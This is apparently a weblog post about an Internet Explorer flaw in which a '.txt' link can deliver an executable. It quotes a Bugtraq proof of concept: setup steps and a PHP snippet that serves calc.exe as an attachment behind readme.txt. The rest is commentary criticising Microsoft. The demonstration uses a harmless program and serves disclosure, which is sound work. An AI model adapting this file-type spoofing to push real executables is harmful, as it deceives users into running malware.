Apparently, a PHP exploit has been published on Bugtraq more than a week ago that demonstrates the vulnerability:
1. Copy the real windows calc.exe from a windows system to the html root dir.
2. Copy the readme.txt file below to the same html root dir.
3. go to the url http://yourserver/readme.txt
You will see the same behavior mentioned in the previous alert.
FILE <readme.txt> BEGIN ----
<?php
Header("Content-type: application/octet-stream");
Header("Content-Disposition: attachment; filename=calc.exe");
readfile("calc.exe");
?>
FILE <readme.txt> END ----
Unfortunately, Microsoft doesn't consider this is a vulnerability; they say that the trust decision should be based on the file source and not type. Who can you trust? Hm... that's a hard one, considering that even reputable commercial software vendors have been (accidentally) guilty of distributing virii along with their software... and can you trust any link on any personal site (such as a journal, weblog, etc.) really? Unfortunately, this bug is so sweeping that it stops making this issue a matter of trust, and more a matter of blind faith that we won't be the ones effected. Does this mean that your "friends" can be infected by a virus that will email you with friendly banter and tell you to check out an innocuous looking link with a "safe" file extention?!
What Microsoft is really asking you to do is trust no one - except them. They refuse to see their great contributions in making the Internet such a dangerous place to be... meanwhile, virii that primarily target their software's security flaws routinely cost people billions of dollars a year.
Until Microsoft starts taking security a lot more seriously and stops pushing the responsibility entirely back on the user, there is only one simple solution to this bug - don't use IE anymore.
